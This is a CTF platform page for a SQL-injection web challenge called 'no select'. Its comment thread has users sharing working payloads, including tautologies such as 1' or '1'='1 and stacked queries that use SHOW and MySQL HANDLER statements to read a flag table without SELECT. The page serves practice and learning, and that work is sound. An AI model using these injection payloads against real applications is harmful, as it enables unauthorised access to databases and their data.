no selectWEB 未解决

分数: 35 金币: 5
题目作者: AL4N233
一  血: 羽义
一血奖励: 5金币
解  决: 2070
提  示:
描  述:
flag{}
评论
ctfer-pls 8月前

懵逼了,原本还想一步步来,没想到第三步输入1' or '1'='1试了下。。。。。

回复 0

2686213396 8月前

sqlmap发现没有数据表可以进行注入,通过手动注入,bpGET发包id=1‘ or1=1 # 响应结果 中即有flag

回复 0

iNMB 8月前

flag{*****}

回复 0

SLfanCTF 8月前

堆叠注入:?id=1';show databases;use flag;show tables;handler flag open;handler flag read first;handler flag read next;....直到读出flag

回复 1

zhuizhui 9月前

?id=1' or 1=1;#--

回复 1

llc123 11月前

直接用万能密码太没意思了,堆叠语句:?id=1';handler flag open;handler flag read next;这里继续拼接handler flag read next;handler flag close;#

回复 2

冥王 11月前

试了好多评论区下面的都不成功,只有这一个成功了?id=1%27+or+1%3D1%23

回复 0

nihaozy 11月前

有哥们通过select编码绕过滤爆出来的吗?我没成功

回复 0
一个姓⎝李⎠的师傅~ 7月前

用 show 查表名,然后堆叠查表内容

回复 0

梦梦子 11月前

1 ’ or '1=1

回复 0

江南花家第七子花满楼 11月前

1' or '1=1

回复 0

WriteUp

image
Serim

10 金币

评分(11)

解题动态

edisonya 攻破了该题 15分钟前
HexHackerCat 攻破了该题 4小时前
Auroraz-a 攻破了该题 4小时前
junjunxiang 攻破了该题 19小时前
BugZhang1 攻破了该题 20小时前
一骑绝尘 攻破了该题 21小时前
小白RM 攻破了该题 21小时前
Tychema 攻破了该题 22小时前
nanaqilin 攻破了该题 1天前
ye 攻破了该题 1天前
影人sha 攻破了该题 2天前
你把握不住 攻破了该题 2天前
lgl 攻破了该题 3天前
loonglone 攻破了该题 4天前
654620946 攻破了该题 4天前
网瘾少年 攻破了该题 4天前
EEEMMMOOO 攻破了该题 4天前
Yvvv1y 攻破了该题 4天前
嘻嘻嘻vvvv 攻破了该题 4天前
ruye07 攻破了该题 4天前
问题反馈